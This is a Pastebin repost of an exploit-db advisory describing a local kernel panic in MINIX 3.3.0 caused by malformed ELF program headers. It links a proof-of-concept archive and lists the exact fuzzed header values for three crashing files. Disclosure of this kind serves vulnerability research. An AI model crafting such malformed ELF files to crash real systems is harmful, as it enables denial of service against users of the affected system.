API tools faq
paste
Advertisement
Mayk0

#; MINIX 3.3.0 Local Denial of Service PoC

Mayk0
Nov 6th, 2014
218
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.07 KB | None | 0 0
raw download clone embed print report
  1. Full title MINIX 3.3.0 Local Denial of Service PoC
  2. Date add 2014-11-07
  3. Category dos / poc
  4. Platform linux
  5. Risk [<font color="#FFFF00">Security Risk Medium</font>]
  6.  
  7. =====================================================
  8.  
  9. # Exploit Title: MINIX 3.3.0 Local Denial of Service
  10. # Exploit Author: nitr0us
  11. # Vendor Homepage: www.minix3.org
  12. # Software Link: http://www.minix3.org/download/index.html
  13. # Version: 3.3.0
  14. # Tested on: MINIX 3.3.0 x86
  15.  
  16. Attached three PoCs (malformed ELFs) and a screenshot of the panic.
  17.  
  18. http://www.exploit-db.com/sploits/35173.zip
  19.  
  20. ----
  21.  
  22. MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable.
  23. Attached three PoCs that panicked the OS, and their modified fields:
  24.  
  25. =================================================================================
  26.  
  27. [+] Malformed ELF: 'orc_0064':
  28.  
  29.  
  30. [+] Fuzzing the Program Header Table with 4 entries
  31. (PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03]
  32. executed
  33. (PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed
  34. (PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed
  35. (PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed
  36. (PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03]
  37. executed
  38. (PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed
  39. (PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed
  40.  
  41. =================================================================================
  42.  
  43. [+] Malformed ELF: 'orc_0090':
  44.  
  45.  
  46. [+] Fuzzing the Program Header Table with 4 entries
  47. (PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed
  48. (PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed
  49.  
  50. =================================================================================
  51.  
  52. [+] Malformed ELF: 'orc_0092':
  53.  
  54.  
  55. [+] Fuzzing the Program Header Table with 4 entries
  56. (PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04]
  57. executed
  58. (PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14]
  59.  
  60. =================================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!